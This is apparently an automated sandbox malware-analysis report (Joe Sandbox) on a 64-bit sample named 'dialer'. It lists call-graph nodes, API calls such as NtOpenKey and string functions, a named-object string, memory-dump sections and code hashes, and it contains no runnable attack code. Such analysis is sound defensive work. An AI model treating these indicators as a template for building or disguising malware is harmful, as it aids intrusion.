2424->2425 2426 140001530 2425->2426 2427 140001394 2 API calls 2426->2427 2428 14000153f 2427->2428 2429 140001394 2 API calls 2428->2429 2430 14000154e 2429->2430 2431 140001394 2 API calls 2430->2431 2432 14000155d 2431->2432 2433 140001394 2 API calls 2432->2433 2434 14000156c 2433->2434 2435 140001394 2 API calls 2434->2435 2436 14000157b 2435->2436 2437 140001394 2 API calls 2436->2437 2438 14000158a 2437->2438 2439 140001394 2 API calls 2438->2439 2440 140001599 2439->2440 2441 140001394 2 API calls 2440->2441 2442 1400015a8 2441->2442 2443 140001394 2 API calls 2442->2443 2444 1400015b7 2443->2444 2445 140001394 2 API calls 2444->2445 2446 1400015c6 2445->2446 2447 140001394 2 API calls 2446->2447 2448 1400015d5 2447->2448 2449 140001394 2 API calls 2448->2449 2450 1400015e4 2449->2450 2451 140001394 2 API calls 2450->2451 2452 1400015f3 2451->2452 2452->2291 2453 14000156c 2452->2453 2454 140001394 2 API calls 2453->2454 2455 14000157b 2454->2455 2456 140001394 2 API calls 2455->2456 2457 14000158a 2456->2457 2458 140001394 2 API calls 2457->2458 2459 140001599 2458->2459 2460 140001394 2 API calls 2459->2460 2461 1400015a8 2460->2461 2462 140001394 2 API calls 2461->2462 2463 1400015b7 2462->2463 2464 140001394 2 API calls 2463->2464 2465 1400015c6 2464->2465 2466 140001394 2 API calls 2465->2466 2467 1400015d5 2466->2467 2468 140001394 2 API calls 2467->2468 2469 1400015e4 2468->2469 2470 140001394 2 API calls 2469->2470 2471 1400015f3 2470->2471 2471->2291 2472 14000145e 2471->2472 2473 140001394 2 API calls 2472->2473 2474 14000146d 2473->2474 2475 140001394 2 API calls 2474->2475 2476 14000147c 2475->2476 2477 140001394 2 API calls 2476->2477 2478 14000148b 2477->2478 2479 140001394 2 API calls 2478->2479 2480 14000149a 2479->2480 2481 140001394 2 API calls 2480->2481 2482 1400014a9 2481->2482 2483 140001394 2 API calls 2482->2483 2484 1400014b8 2483->2484 2485 140001394 2 API calls 2484->2485 2486 1400014c7 2485->2486 2487 140001394 2 API calls 2486->2487 2488 1400014d6 2487->2488 2489 1400014e5 2488->2489 2490 140001394 2 API calls 2488->2490 2491 140001394 2 API calls 2489->2491 2490->2489 2492 1400014ef 2491->2492 2493 1400014f4 2492->2493 2494 140001394 2 API calls 2492->2494 2495 140001394 2 API calls 2493->2495 2494->2493 2496 1400014fe 2495->2496 2497 140001503 2496->2497 2498 140001394 2 API calls 2496->2498 2499 140001394 2 API calls 2497->2499 2498->2497 2500 14000150d 2499->2500 2501 140001394 2 API calls 2500->2501 2502 140001512 2501->2502 2503 140001394 2 API calls 2502->2503 2504 140001521 2503->2504 2505 140001394 2 API calls 2504->2505 2506 140001530 2505->2506 2507 140001394 2 API calls 2506->2507 2508 14000153f 2507->2508 2509 140001394 2 API calls 2508->2509 2510 14000154e 2509->2510 2511 140001394 2 API calls 2510->2511 2512 14000155d 2511->2512 2513 140001394 2 API calls 2512->2513 2514 14000156c 2513->2514 2515 140001394 2 API calls 2514->2515 2516 14000157b 2515->2516 2517 140001394 2 API calls 2516->2517 2518 14000158a 2517->2518 2519 140001394 2 API calls 2518->2519 2520 140001599 2519->2520 2521 140001394 2 API calls 2520->2521 2522 1400015a8 2521->2522 2523 140001394 2 API calls 2522->2523 2524 1400015b7 2523->2524 2525 140001394 2 API calls 2524->2525 2526 1400015c6 2525->2526 2527 140001394 2 API calls 2526->2527 2528 1400015d5 2527->2528 2529 140001394 2 API calls 2528->2529 2530 1400015e4 2529->2530 2531 140001394 2 API calls 2530->2531 2532 1400015f3 2531->2532 2532->2291 2534 140001394 2 API calls 2533->2534 2535 14000158a 2534->2535 2536 140001394 2 API calls 2535->2536 2537 140001599 2536->2537 2538 140001394 2 API calls 2537->2538 2539 1400015a8 2538->2539 2540 140001394 2 API calls 2539->2540 2541 1400015b7 2540->2541 2542 140001394 2 API calls 2541->2542 2543 1400015c6 2542->2543 2544 140001394 2 API calls 2543->2544 2545 1400015d5 2544->2545 2546 140001394 2 API calls 2545->2546 2547 1400015e4 2546->2547 2548 140001394 2 API calls 2547->2548 2549 1400015f3 2548->2549 2549->2365 2551 140001394 2 API calls 2550->2551 2552 1400015a8 2551->2552 2553 140001394 2 API calls 2552->2553 2554 1400015b7 2553->2554 2555 140001394 2 API calls 2554->2555 2556 1400015c6 2555->2556 2557 140001394 2 API calls 2556->2557 2558 1400015d5 2557->2558 2559 140001394 2 API calls 2558->2559 2560 1400015e4 2559->2560 2561 140001394 2 API calls 2560->2561 2562 1400015f3 2561->2562 2562->2365 2564 140001394 2 API calls 2563->2564 2565 1400015b7 2564->2565 2566 140001394 2 API calls 2565->2566 2567 1400015c6 2566->2567 2568 140001394 2 API calls 2567->2568 2569 1400015d5 2568->2569 2570 140001394 2 API calls 2569->2570 2571 1400015e4 2570->2571 2572 140001394 2 API calls 2571->2572 2573 1400015f3 2572->2573 2573->2365 2575 140001394 2 API calls 2574->2575 2576 14000147c 2575->2576 2577 140001394 2 API calls 2576->2577 2578 14000148b 2577->2578 2579 140001394 2 API calls 2578->2579 2580 14000149a 2579->2580 2581 140001394 2 API calls 2580->2581 2582 1400014a9 2581->2582 2583 140001394 2 API calls 2582->2583 2584 1400014b8 2583->2584 2585 140001394 2 API calls 2584->2585 2586 1400014c7 2585->2586 2587 140001394 2 API calls 2586->2587 2588 1400014d6 2587->2588 2589 1400014e5 2588->2589 2590 140001394 2 API calls 2588->2590 2591 140001394 2 API calls 2589->2591 2590->2589 2592 1400014ef 2591->2592 2593 1400014f4 2592->2593 2594 140001394 2 API calls 2592->2594 2595 140001394 2 API calls 2593->2595 2594->2593 2596 1400014fe 2595->2596 2597 140001503 2596->2597 2598 140001394 2 API calls 2596->2598 2599 140001394 2 API calls 2597->2599 2598->2597 2600 14000150d 2599->2600 2601 140001394 2 API calls 2600->2601 2602 140001512 2601->2602 2603 140001394 2 API calls 2602->2603 2604 140001521 2603->2604 2605 140001394 2 API calls 2604->2605 2606 140001530 2605->2606 2607 140001394 2 API calls 2606->2607 2608 14000153f 2607->2608 2609 140001394 2 API calls 2608->2609 2610 14000154e 2609->2610 2611 140001394 2 API calls 2610->2611 2612 14000155d 2611->2612 2613 140001394 2 API calls 2612->2613 2614 14000156c 2613->2614 2615 140001394 2 API calls 2614->2615 2616 14000157b 2615->2616 2617 140001394 2 API calls 2616->2617 2618 14000158a 2617->2618 2619 140001394 2 API calls 2618->2619 2620 140001599 2619->2620 2621 140001394 2 API calls 2620->2621 2622 1400015a8 2621->2622 2623 140001394 2 API calls 2622->2623 2624 1400015b7 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015c6 2625->2626 2627 140001394 2 API calls 2626->2627 2628 1400015d5 2627->2628 2629 140001394 2 API calls 2628->2629 2630 1400015e4 2629->2630 2631 140001394 2 API calls 2630->2631 2632 1400015f3 2631->2632 2632->2332 2633 140001530 2632->2633 2634 140001394 2 API calls 2633->2634 2635 14000153f 2634->2635 2636 140001394 2 API calls 2635->2636 2637 14000154e 2636->2637 2638 140001394 2 API calls 2637->2638 2639 14000155d 2638->2639 2640 140001394 2 API calls 2639->2640 2641 14000156c 2640->2641 2642 140001394 2 API calls 2641->2642 2643 14000157b 2642->2643 2644 140001394 2 API calls 2643->2644 2645 14000158a 2644->2645 2646 140001394 2 API calls 2645->2646 2647 140001599 2646->2647 2648 140001394 2 API calls 2647->2648 2649 1400015a8 2648->2649 2650 140001394 2 API calls 2649->2650 2651 1400015b7 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015c6 2652->2653 2654 140001394 2 API calls 2653->2654 2655 1400015d5 2654->2655 2656 140001394 2 API calls 2655->2656 2657 1400015e4 2656->2657 2658 140001394 2 API calls 2657->2658 2659 1400015f3 2658->2659 2659->2337 2659->2338 2661 140001394 2 API calls 2660->2661 2662 1400014b8 2661->2662 2663 140001394 2 API calls 2662->2663 2664 1400014c7 2663->2664 2665 140001394 2 API calls 2664->2665 2666 1400014d6 2665->2666 2667 1400014e5 2666->2667 2668 140001394 2 API calls 2666->2668 2669 140001394 2 API calls 2667->2669 2668->2667 2670 1400014ef 2669->2670 2671 1400014f4 2670->2671 2672 140001394 2 API calls 2670->2672 2673 140001394 2 API calls 2671->2673 2672->2671 2674 1400014fe 2673->2674 2675 140001503 2674->2675 2676 140001394 2 API calls 2674->2676 2677 140001394 2 API calls 2675->2677 2676->2675 2678 14000150d 2677->2678 2679 140001394 2 API calls 2678->2679 2680 140001512 2679->2680 2681 140001394 2 API calls 2680->2681 2682 140001521 2681->2682 2683 140001394 2 API calls 2682->2683 2684 140001530 2683->2684 2685 140001394 2 API calls 2684->2685 2686 14000153f 2685->2686 2687 140001394 2 API calls 2686->2687 2688 14000154e 2687->2688 2689 140001394 2 API calls 2688->2689 2690 14000155d 2689->2690 2691 140001394 2 API calls 2690->2691 2692 14000156c 2691->2692 2693 140001394 2 API calls 2692->2693 2694 14000157b 2693->2694 2695 140001394 2 API calls 2694->2695 2696 14000158a 2695->2696 2697 140001394 2 API calls 2696->2697 2698 140001599 2697->2698 2699 140001394 2 API calls 2698->2699 2700 1400015a8 2699->2700 2701 140001394 2 API calls 2700->2701 2702 1400015b7 2701->2702 2703 140001394 2 API calls 2702->2703 2704 1400015c6 2703->2704 2705 140001394 2 API calls 2704->2705 2706 1400015d5 2705->2706 2707 140001394 2 API calls 2706->2707 2708 1400015e4 2707->2708 2709 140001394 2 API calls 2708->2709 2710 1400015f3 2709->2710 2710->2347 2711 140001440 2710->2711 2712 140001394 2 API calls 2711->2712 2713 14000144f 2712->2713 2714 140001394 2 API calls 2713->2714 2715 14000145e 2714->2715 2716 140001394 2 API calls 2715->2716 2717 14000146d 2716->2717 2718 140001394 2 API calls 2717->2718 2719 14000147c 2718->2719 2720 140001394 2 API calls 2719->2720 2721 14000148b 2720->2721 2722 140001394 2 API calls 2721->2722 2723 14000149a 2722->2723 2724 140001394 2 API calls 2723->2724 2725 1400014a9 2724->2725 2726 140001394 2 API calls 2725->2726 2727 1400014b8 2726->2727 2728 140001394 2 API calls 2727->2728 2729 1400014c7 2728->2729 2730 140001394 2 API calls 2729->2730 2731 1400014d6 2730->2731 2732 1400014e5 2731->2732 2733 140001394 2 API calls 2731->2733 2734 140001394 2 API calls 2732->2734 2733->2732 2735 1400014ef 2734->2735 2736 1400014f4 2735->2736 2737 140001394 2 API calls 2735->2737 2738 140001394 2 API calls 2736->2738 2737->2736 2739 1400014fe 2738->2739 2740 140001503 2739->2740 2741 140001394 2 API calls 2739->2741 2742 140001394 2 API calls 2740->2742 2741->2740 2743 14000150d 2742->2743 2744 140001394 2 API calls 2743->2744 2745 140001512 2744->2745 2746 140001394 2 API calls 2745->2746 2747 140001521 2746->2747 2748 140001394 2 API calls 2747->2748 2749 140001530 2748->2749 2750 140001394 2 API calls 2749->2750 2751 14000153f 2750->2751 2752 140001394 2 API calls 2751->2752 2753 14000154e 2752->2753 2754 140001394 2 API calls 2753->2754 2755 14000155d 2754->2755 2756 140001394 2 API calls 2755->2756 2757 14000156c 2756->2757 2758 140001394 2 API calls 2757->2758 2759 14000157b 2758->2759 2760 140001394 2 API calls 2759->2760 2761 14000158a 2760->2761 2762 140001394 2 API calls 2761->2762 2763 140001599 2762->2763 2764 140001394 2 API calls 2763->2764 2765 1400015a8 2764->2765 2766 140001394 2 API calls 2765->2766 2767 1400015b7 2766->2767 2768 140001394 2 API calls 2767->2768 2769 1400015c6 2768->2769 2770 140001394 2 API calls 2769->2770 2771 1400015d5 2770->2771 2772 140001394 2 API calls 2771->2772 2773 1400015e4 2772->2773 2774 140001394 2 API calls 2773->2774 2775 1400015f3 2774->2775 2775->2347 2775->2356 2777 1400014e5 2776->2777 2778 140001394 2 API calls 2776->2778 2779 140001394 2 API calls 2777->2779 2778->2777 2780 1400014ef 2779->2780 2781 1400014f4 2780->2781 2782 140001394 2 API calls 2780->2782 2783 140001394 2 API calls 2781->2783 2782->2781 2784 1400014fe 2783->2784 2785 140001503 2784->2785 2786 140001394 2 API calls 2784->2786 2787 140001394 2 API calls 2785->2787 2786->2785 2788 14000150d 2787->2788 2789 140001394 2 API calls 2788->2789 2790 140001512 2789->2790 2791 140001394 2 API calls 2790->2791 2792 140001521 2791->2792 2793 140001394 2 API calls 2792->2793 2794 140001530 2793->2794 2795 140001394 2 API calls 2794->2795 2796 14000153f 2795->2796 2797 140001394 2 API calls 2796->2797 2798 14000154e 2797->2798 2799 140001394 2 API calls 2798->2799 2800 14000155d 2799->2800 2801 140001394 2 API calls 2800->2801 2802 14000156c 2801->2802 2803 140001394 2 API calls 2802->2803 2804 14000157b 2803->2804 2805 140001394 2 API calls 2804->2805 2806 14000158a 2805->2806 2807 140001394 2 API calls 2806->2807 2808 140001599 2807->2808 2809 140001394 2 API calls 2808->2809 2810 1400015a8 2809->2810 2811 140001394 2 API calls 2810->2811 2812 1400015b7 2811->2812 2813 140001394 2 API calls 2812->2813 2814 1400015c6 2813->2814 2815 140001394 2 API calls 2814->2815 2816 1400015d5 2815->2816 2817 140001394 2 API calls 2816->2817 2818 1400015e4 2817->2818 2819 140001394 2 API calls 2818->2819 2820 1400015f3 2819->2820 2820->2384 2822 140001394 2 API calls 2821->2822 2823 140001530 2822->2823 2824 140001394 2 API calls 2823->2824 2825 14000153f 2824->2825 2826 140001394 2 API calls 2825->2826 2827 14000154e 2826->2827 2828 140001394 2 API calls 2827->2828 2829 14000155d 2828->2829 2830 140001394 2 API calls 2829->2830 2831 14000156c 2830->2831 2832 140001394 2 API calls 2831->2832 2833 14000157b 2832->2833 2834 140001394 2 API calls 2833->2834 2835 14000158a 2834->2835 2836 140001394 2 API calls 2835->2836 2837 140001599 2836->2837 2838 140001394 2 API calls 2837->2838 2839 1400015a8 2838->2839 2840 140001394 2 API calls 2839->2840 2841 1400015b7 2840->2841 2842 140001394 2 API calls 2841->2842 2843 1400015c6 2842->2843 2844 140001394 2 API calls 2843->2844 2845 1400015d5 2844->2845 2846 140001394 2 API calls 2845->2846 2847 1400015e4 2846->2847 2848 140001394 2 API calls 2847->2848 2849 1400015f3 2848->2849 2849->2384 2851 140001394 2 API calls 2850->2851 2852 140001431 2851->2852 2853 140001394 2 API calls 2852->2853 2854 140001440 2853->2854 2855 140001394 2 API calls 2854->2855 2856 14000144f 2855->2856 2857 140001394 2 API calls 2856->2857 2858 14000145e 2857->2858 2859 140001394 2 API calls 2858->2859 2860 14000146d 2859->2860 2861 140001394 2 API calls 2860->2861 2862 14000147c 2861->2862 2863 140001394 2 API calls 2862->2863 2864 14000148b 2863->2864 2865 140001394 2 API calls 2864->2865 2866 14000149a 2865->2866 2867 140001394 2 API calls 2866->2867 2868 1400014a9 2867->2868 2869 140001394 2 API calls 2868->2869 2870 1400014b8 2869->2870 2871 140001394 2 API calls 2870->2871 2872 1400014c7 2871->2872 2873 140001394 2 API calls 2872->2873 2874 1400014d6 2873->2874 2875 1400014e5 2874->2875 2876 140001394 2 API calls 2874->2876 2877 140001394 2 API calls 2875->2877 2876->2875 2878 1400014ef 2877->2878 2879 1400014f4 2878->2879 2880 140001394 2 API calls 2878->2880 2881 140001394 2 API calls 2879->2881 2880->2879 2882 1400014fe 2881->2882 2883 140001503 2882->2883 2884 140001394 2 API calls 2882->2884 2885 140001394 2 API calls 2883->2885 2884->2883 2886 14000150d 2885->2886 2887 140001394 2 API calls 2886->2887 2888 140001512 2887->2888 2889 140001394 2 API calls 2888->2889 2890 140001521 2889->2890 2891 140001394 2 API calls 2890->2891 2892 140001530 2891->2892 2893 140001394 2 API calls 2892->2893 2894 14000153f 2893->2894 2895 140001394 2 API calls 2894->2895 2896 14000154e 2895->2896 2897 140001394 2 API calls 2896->2897 2898 14000155d 2897->2898 2899 140001394 2 API calls 2898->2899 2900 14000156c 2899->2900 2901 140001394 2 API calls 2900->2901 2902 14000157b 2901->2902 2903 140001394 2 API calls 2902->2903 2904 14000158a 2903->2904 2905 140001394 2 API calls 2904->2905 2906 140001599 2905->2906 2907 140001394 2 API calls 2906->2907 2908 1400015a8 2907->2908 2909 140001394 2 API calls 2908->2909 2910 1400015b7 2909->2910 2911 140001394 2 API calls 2910->2911 2912 1400015c6 2911->2912 2913 140001394 2 API calls 2912->2913 2914 1400015d5 2913->2914 2915 140001394 2 API calls 2914->2915 2916 1400015e4 2915->2916 2917 140001394 2 API calls 2916->2917 2918 1400015f3 2917->2918 2918->2384 2920 140001394 2 API calls 2919->2920 2921 140001440 2920->2921 2922 140001394 2 API calls 2921->2922 2923 14000144f 2922->2923 2924 140001394 2 API calls 2923->2924 2925 14000145e 2924->2925 2926 140001394 2 API calls 2925->2926 2927 14000146d 2926->2927 2928 140001394 2 API calls 2927->2928 2929 14000147c 2928->2929 2930 140001394 2 API calls 2929->2930 2931 14000148b 2930->2931 2932 140001394 2 API calls 2931->2932 2933 14000149a 2932->2933 2934 140001394 2 API calls 2933->2934 2935 1400014a9 2934->2935 2936 140001394 2 API calls 2935->2936 2937 1400014b8 2936->2937 2938 140001394 2 API calls 2937->2938 2939 1400014c7 2938->2939 2940 140001394 2 API calls 2939->2940 2941 1400014d6 2940->2941 2942 1400014e5 2941->2942 2943 140001394 2 API calls 2941->2943 2944 140001394 2 API calls 2942->2944 2943->2942 2945 1400014ef 2944->2945 2946 1400014f4 2945->2946 2947 140001394 2 API calls 2945->2947 2948 140001394 2 API calls 2946->2948 2947->2946 2949 1400014fe 2948->2949 2950 140001503 2949->2950 2951 140001394 2 API calls 2949->2951 2952 140001394 2 API calls 2950->2952 2951->2950 2953 14000150d 2952->2953 2954 140001394 2 API calls 2953->2954 2955 140001512 2954->2955 2956 140001394 2 API calls 2955->2956 2957 140001521 2956->2957 2958 140001394 2 API calls 2957->2958 2959 140001530 2958->2959 2960 140001394 2 API calls 2959->2960 2961 14000153f 2960->2961 2962 140001394 2 API calls 2961->2962 2963 14000154e 2962->2963 2964 140001394 2 API calls 2963->2964 2965 14000155d 2964->2965 2966 140001394 2 API calls 2965->2966 2967 14000156c 2966->2967 2968 140001394 2 API calls 2967->2968 2969 14000157b 2968->2969 2970 140001394 2 API calls 2969->2970 2971 14000158a 2970->2971 2972 140001394 2 API calls 2971->2972 2973 140001599 2972->2973 2974 140001394 2 API calls 2973->2974 2975 1400015a8 2974->2975 2976 140001394 2 API calls 2975->2976 2977 1400015b7 2976->2977 2978 140001394 2 API calls 2977->2978 2979 1400015c6 2978->2979 2980 140001394 2 API calls 2979->2980 2981 1400015d5 2980->2981 2982 140001394 2 API calls 2981->2982 2983 1400015e4 2982->2983 2984 140001394 2 API calls 2983->2984 2985 1400015f3 2984->2985 2985->2384

                                                                  Callgraph

                                                                  • Executed
                                                                  • Not Executed
                                                                  • Opacity -> Relevance
                                                                  • Disassembly available
                                                                  callgraph 0 Function_00000001400062E1 1 Function_00000001400031E1 2 Function_00000001400026E1 3 Function_0000000140001AE4 38 Function_0000000140001D40 3->38 79 Function_0000000140001BA0 3->79 4 Function_00000001400014E5 75 Function_0000000140001394 4->75 5 Function_0000000140002FF0 60 Function_0000000140001370 5->60 6 Function_00000001400010F0 7 Function_00000001400065F0 8 Function_00000001400063F1 9 Function_00000001400014F4 9->75 10 Function_0000000140001800 69 Function_0000000140002290 10->69 11 Function_0000000140002500 12 Function_0000000140006400 13 Function_0000000140003200 14 Function_0000000140001E00 15 Function_0000000140001000 15->14 43 Function_0000000140001750 15->43 86 Function_0000000140001FB0 15->86 94 Function_0000000140001FC0 15->94 16 Function_0000000140006301 17 Function_0000000140001503 17->75 18 Function_0000000140001404 18->75 19 Function_0000000140002104 20 Function_0000000140006610 21 Function_0000000140001E10 22 Function_0000000140001512 22->75 23 Function_0000000140003220 24 Function_0000000140002320 25 Function_0000000140002420 26 Function_0000000140006620 26->20 27 Function_0000000140001521 27->75 28 Function_0000000140006421 29 Function_0000000140006321 30 Function_0000000140001422 30->75 31 Function_0000000140001530 31->75 32 Function_0000000140001431 32->75 33 Function_0000000140006531 34 Function_000000014000153F 34->75 35 Function_0000000140003240 35->5 35->17 35->20 35->27 35->30 35->31 35->32 35->34 36 Function_0000000140001440 35->36 49 Function_000000014000145E 35->49 52 Function_0000000140002660 35->52 56 Function_000000014000156C 35->56 57 Function_000000014000146D 35->57 35->60 64 Function_000000014000157B 35->64 77 Function_0000000140001599 35->77 83 Function_00000001400015A8 35->83 84 Function_00000001400014A9 35->84 93 Function_00000001400016C0 35->93 102 Function_00000001400027D0 35->102 106 Function_00000001400014D6 35->106 36->75 37 Function_0000000140001140 51 Function_0000000140001160 37->51 38->69 39 Function_0000000140006341 40 Function_0000000140003141 41 Function_0000000140001F47 59 Function_0000000140001870 41->59 42 Function_0000000140002050 44 Function_0000000140001650 45 Function_0000000140002751 46 Function_0000000140006451 47 Function_0000000140006551 48 Function_000000014000155D 48->75 49->75 50 Function_0000000140001760 107 Function_00000001400020E0 50->107 51->35 51->51 51->59 65 Function_0000000140001880 51->65 68 Function_0000000140001F90 51->68 51->93 53 Function_0000000140002460 54 Function_0000000140003160 55 Function_0000000140001E65 55->59 56->75 57->75 58 Function_000000014000216F 61 Function_0000000140001A70 61->38 61->79 62 Function_0000000140002770 63 Function_0000000140006371 64->75 65->25 65->38 65->52 65->79 66 Function_0000000140003180 67 Function_0000000140006481 70 Function_0000000140002590 71 Function_0000000140002790 72 Function_0000000140002691 73 Function_0000000140006391 74 Function_0000000140006591 75->26 101 Function_00000001400068D0 75->101 76 Function_0000000140002194 76->59 77->75 78 Function_000000014000219E 79->38 85 Function_00000001400023B0 79->85 100 Function_00000001400024D0 79->100 80 Function_0000000140001FA0 81 Function_00000001400027A0 82 Function_00000001400031A1 83->75 84->75 87 Function_00000001400022B0 88 Function_00000001400026B0 89 Function_00000001400027B1 90 Function_00000001400062B1 91 Function_00000001400063B1 92 Function_0000000140001AB3 92->38 92->79 95 Function_00000001400064C1 96 Function_0000000140001AC3 96->38 96->79 97 Function_00000001400014C7 97->75 98 Function_00000001400026D0 99 Function_0000000140001FD0 101->20 102->4 102->9 102->17 102->20 102->22 102->48 102->49 102->52 102->60 102->84 102->97 103 Function_00000001400017D0 104 Function_00000001400063D1 105 Function_0000000140001AD4 105->38 105->79 106->75 108 Function_00000001400017E0 108->107 109 Function_00000001400022E0

                                                                  Executed Functions

                                                                  Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 140001394-140001403 call 140006620 call 1400068d0 NtOpenKey
                                                                  APIs
                                                                  • NtOpenKey.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                  Memory Dump Source
                                                                  • Source File: 00000040.00000002.2936348681.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000040.00000002.2936284891.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936432899.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936512648.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936630716.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID:
                                                                  • API String ID: 71445658-0
                                                                  • Opcode ID: 6be8016fb36f82c3da64a84c1529aa11406b64e43b79967214b429f8e454d36b
                                                                  • Instruction ID: a491f1afa2254d8e491352d0748b00eed3e2628b9b22ab978c5d7e1ef0c2ef5b
                                                                  • Opcode Fuzzy Hash: 6be8016fb36f82c3da64a84c1529aa11406b64e43b79967214b429f8e454d36b
                                                                  • Instruction Fuzzy Hash: B9F09DB2608B408AEA12DF62F85179A77A1F39C7C0F009919BBC853735DB38C190CB40

                                                                  Non-executed Functions

                                                                  Function 00000001400027D0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 376COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 385 1400027d0-14000282b call 140002660 memset 388 140002831-14000283b 385->388 389 1400028fe-14000294e call 14000155d 385->389 391 140002864-14000286a 388->391 394 140002a43-140002a6b call 1400014c7 389->394 395 140002954-140002963 389->395 391->389 393 140002870-140002877 391->393 396 140002879-140002882 393->396 397 140002840-140002842 393->397 412 140002a76-140002ab8 call 140001503 call 140006610 memset 394->412 413 140002a6d 394->413 398 140002fa7-140002fe4 call 140001370 395->398 399 140002969-140002978 395->399 402 140002884-14000289b 396->402 403 1400028e8-1400028eb 396->403 400 14000284a-14000285e 397->400 404 1400029d4-140002a3e wcsncmp call 1400014e5 399->404 405 14000297a-1400029cd 399->405 400->389 400->391 408 1400028e5 402->408 409 14000289d-1400028b2 402->409 403->400 404->394 405->404 408->403 414 1400028c0-1400028c7 409->414 421 140002f39-140002f74 call 140001370 412->421 422 140002abe-140002ac5 412->422 413->412 415 1400028c9-1400028e3 414->415 416 1400028f0-1400028f9 414->416 415->408 415->414 416->400 425 140002ac7-140002afc 421->425 429 140002f7a 421->429 424 140002b03-140002b33 wcscpy wcscat wcslen 422->424 422->425 427 140002b35-140002b66 wcslen 424->427 428 140002b68-140002b95 424->428 425->424 430 140002b98-140002baf wcslen 427->430 428->430 429->424 431 140002bb5-140002bc8 430->431 432 140002f7f-140002f9b call 140001370 430->432 434 140002be5-140002eeb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 431->434 435 140002bca-140002bde 431->435 432->398 453 140002eed-140002f0b call 140001512 434->453 454 140002f10-140002f38 call 14000145e 434->454 435->434 453->454
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000040.00000002.2936348681.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000040.00000002.2936284891.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936432899.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936512648.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936630716.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                                                  • String ID: 0$X$\BaseNamedObjects\gohkfyvqbpmecnid$`
                                                                  • API String ID: 780471329-2131913626
                                                                  • Opcode ID: 1797c675c7d499b762c492f57bc66f0dd952a150cabb47eb5dc0e9800f8e4f22
                                                                  • Instruction ID: 956054282284ba03289f89f3cc30737ba7bc10dd6e0d7d1cce8e88f75dff8f4e
                                                                  • Opcode Fuzzy Hash: 1797c675c7d499b762c492f57bc66f0dd952a150cabb47eb5dc0e9800f8e4f22
                                                                  • Instruction Fuzzy Hash: 76126AB2618BC081E762CB26F8443EAB7A4F789794F414215EBA957BF5DF78C189C700
                                                                  Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000040.00000002.2936348681.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000040.00000002.2936284891.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936432899.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936512648.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936630716.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                  • String ID:
                                                                  • API String ID: 2643109117-0
                                                                  • Opcode ID: 7fd7b0665d0d478afd4b778b9ad3b37bf3618c53fbd75c2eb7eefae68cdd4a41
                                                                  • Instruction ID: 2cf36224565f858ee5398084e6954f654d065b2d5c5980acf610c9099daef405
                                                                  • Opcode Fuzzy Hash: 7fd7b0665d0d478afd4b778b9ad3b37bf3618c53fbd75c2eb7eefae68cdd4a41
                                                                  • Instruction Fuzzy Hash: 3F5121F1601A4085FB16EF27F9943EA27A1BB8CBD0F449121FB4E873B2DE3884958700
                                                                  Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
